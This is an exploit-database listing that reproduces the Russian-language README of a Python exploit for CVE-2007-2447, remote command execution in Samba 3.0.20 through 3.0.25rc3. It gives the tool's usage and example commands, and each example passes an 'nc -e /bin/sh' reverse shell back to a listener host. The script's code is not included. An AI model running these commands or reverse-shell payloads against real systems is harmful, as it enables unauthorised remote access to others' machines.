Sploitus

Exploit for CVE-2007-2447-in-Python

kitploit · 2026-08-25

Exploit Code

MARKDOWN28 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZIEMNI-CVE-2007-2447-IN-PYTHON
# CVE-2007-2447 - Реализация на Python

## Описание

Реализация на Python RCE-эксплойта 'Username' map script' для Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).

## Использование

`python3 smbExploit.py <IP> <PORT> <PAYLOAD>`

  * IP - IP удаленной машины.
  * PORT - (Необязательно) Порт, на котором работает smb.
  * PAYLOAD - Полезная нагрузка (payload) для выполнения на удаленной машине, например reverse shell.



Примеры:

`python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'`

`python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'`

## Ресурсы

CVE-2007-2447: Уязвимость удаленного внедрения команд

Samba 3.0.20 < 3.0.25rc3 - Выполнение команд через 'Username map script' (Metasploit)